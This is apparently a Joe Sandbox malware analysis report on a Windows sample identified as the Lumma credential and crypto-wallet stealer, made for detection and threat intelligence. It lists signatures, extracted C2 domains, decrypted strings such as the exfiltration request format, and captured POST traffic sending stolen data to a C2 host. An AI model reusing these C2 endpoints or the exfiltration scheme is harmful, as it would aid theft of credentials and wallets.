Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VoGtelkHSn.exe

Overview

General Information

Sample name:VoGtelkHSn.exe
renamed because original name is a hash value
Original sample name:7f26737f63fcd5b7e2695f438e341075.exe
Analysis ID:1431970
MD5:7f26737f63fcd5b7e2695f438e341075
SHA1:325092e21e3089979756be19047c44bc4d036dc6
SHA256:ba7b9fc2750021800299ae2473acdcc6f5bf93e391bebe5da3cd7959904980ff
Tags:32exetrojan
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VoGtelkHSn.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\VoGtelkHSn.exe" MD5: 7F26737F63FCD5B7E2695F438E341075)
    • WerFault.exe (PID: 3712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 1612 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1150:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Process Memory Space: VoGtelkHSn.exe PID: 5444JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: VoGtelkHSn.exe PID: 5444JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            Timestamp:04/26/24-05:44:01.105350
            SID:2052230
            Source Port:49706
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:44:03.319178
            SID:2052230
            Source Port:49708
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:43:59.940120
            SID:2052230
            Source Port:49705
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:44:05.638317
            SID:2052230
            Source Port:49710
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:43:58.725101
            SID:2052229
            Source Port:57412
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:44:04.568308
            SID:2052230
            Source Port:49709
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:43:58.891180
            SID:2052230
            Source Port:49704
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:44:07.287198
            SID:2052230
            Source Port:49711
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-05:44:02.110134
            SID:2052230
            Source Port:49707
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://strollheavengwu.shop/apiAvira URL Cloud: Label: malware
            Source: 0.2.VoGtelkHSn.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}
            Source: shortsvelventysjo.shopVirustotal: Detection: 16%Perma Link
            Source: liabilitynighstjsko.shopVirustotal: Detection: 17%Perma Link
            Source: tolerateilusidjukl.shopVirustotal: Detection: 14%Perma Link
            Source: incredibleextedwj.shopVirustotal: Detection: 14%Perma Link
            Source: https://strollheavengwu.shop/apiVVirustotal: Detection: 9%Perma Link
            Source: shatterbreathepsw.shopVirustotal: Detection: 17%Perma Link
            Source: demonstationfukewko.shopVirustotal: Detection: 18%Perma Link
            Source: https://strollheavengwu.shop/apiVirustotal: Detection: 11%Perma Link
            Source: productivelookewr.shopVirustotal: Detection: 16%Perma Link
            Source: alcojoldwograpciw.shopVirustotal: Detection: 17%Perma Link
            Source: VoGtelkHSn.exeReversingLabs: Detection: 42%
            Source: VoGtelkHSn.exeVirustotal: Detection: 41%Perma Link
            Source: VoGtelkHSn.exeJoe Sandbox ML: detected
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: demonstationfukewko.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: liabilitynighstjsko.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: alcojoldwograpciw.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: incredibleextedwj.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: shortsvelventysjo.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: shatterbreathepsw.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: tolerateilusidjukl.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: productivelookewr.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: strollheavengwu.shop
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000003.2024411779.0000000002F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: P6Mk0M--superstar
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 0_2_00415999 CryptUnprotectData,0_2_00415999

            Compliance

            barindex
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeUnpacked PE file: 0.2.VoGtelkHSn.exe.400000.0.unpack
            Source: VoGtelkHSn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00422458
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041C540
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_004357CA
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_004359E2
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A4h]0_2_00414C49
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_00433D10
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]0_2_00433D10
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00424087
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00424084
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0040D140
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov esi, ebp0_2_00403260
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00423943
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_0041F234
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then inc ebx0_2_004142F0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov dword ptr [esi+000005E0h], 00000000h0_2_004103EF
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then push 00000000h0_2_0041E451
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0041A420
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0041A420
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then jmp ecx0_2_00414596
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_0041F640
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], dx0_2_004146E6
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+4Ch]0_2_0042271D
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then inc eax0_2_004137C9
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movzx ebx, word ptr [edx]0_2_0041F828
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_0041A8C0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0042F890
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_0042594F
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_004259CD
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_004259D2
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000E0h]0_2_00411A44
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then inc ebx0_2_0040FA49
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movzx ebp, byte ptr [eax+edx]0_2_00431A70
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then jmp edx0_2_00437C47
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then jmp edx0_2_00437C45
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+000000C0h]0_2_00413C46
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00421CC7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+30h]0_2_00424CB0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]0_2_00415D7D
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+000005E0h]0_2_00413E4A
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_02ED42EE
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_02ED42EB
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_02EBD3A7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h0_2_02ECD377
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+000005E0h]0_2_02EC40B1
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02ED26BF
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then push 00000000h0_2_02ECE6B8
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_02ECA687
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], dx0_2_02ECA687
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov dword ptr [esi+000005E0h], 00000000h0_2_02EC0656
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then jmp ecx0_2_02EC47FD
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02ECC7A7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov esi, ebp0_2_02EB34C7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_02ED3BAA
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_02ECF49B
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [00440984h]0_2_02EC7494
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then inc ebx0_2_02EC4557
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02EDFAF7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movzx ebx, word ptr [edx]0_2_02ECFA8F
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then inc eax0_2_02EC3A30
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_02EE5A31
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_02ED5BB6
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_02ECAB27
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_02ECF8A7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+4Ch]0_2_02ED2984
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov word ptr [eax], dx0_2_02EC494D
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then jmp edx0_2_02EE7EAE
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+000000C0h]0_2_02EC3EAD
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then jmp edx0_2_02EE7EAC
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A4h]0_2_02EC4EB0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]0_2_02EC5FE4
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_02EE3F77
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]0_2_02EE3F77
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_02ED1F2E
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esi+30h]0_2_02ED4F17
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then movzx ebp, byte ptr [eax+edx]0_2_02EE1CD7
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000E0h]0_2_02EC1CAB
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then inc ebx0_2_02EBFCB0
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_02EE5C49
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_02ED5C39
            Source: C:\Users\user\Desktop\VoGtelkHSn.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_02ED5C34

            Networking

            barindex
            Source: TrafficSnort IDS: 2052229 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop) 192.168.2.5:57412 -> 1.1.1.1:53
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49704 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49705 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49706 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49707 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49708 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49709 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49710 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.5:49711 -> 172.67.163.209:443
            Source: Malware configuration extractorURLs: demonstationfukewko.shop
            Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
            Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
            Source: Malware configuration extractorURLs: incredibleextedwj.shop
            Source: Malware configuration extractorURLs: shortsvelventysjo.shop
            Source: Malware configuration extractorURLs: shatterbreathepsw.shop
            Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
            Source: Malware configuration extractorURLs: productivelookewr.shop
            Source: Malware configuration extractorURLs: strollheavengwu.shop
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 58Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12839Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20571Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5448Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1385Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 577060Host: strollheavengwu.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: strollheavengwu.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: VoGtelkHSn.exe, 00000000.00000003.2069686812.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
            Source: VoGtelkHSn.exe, 00000000.00000003.2081199530.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, VoGtelkHSn.exe, 00000000.00000003.2081217841.0000000002CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: VoGtelkHSn.exe, 00000000.00000003.2047950113.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
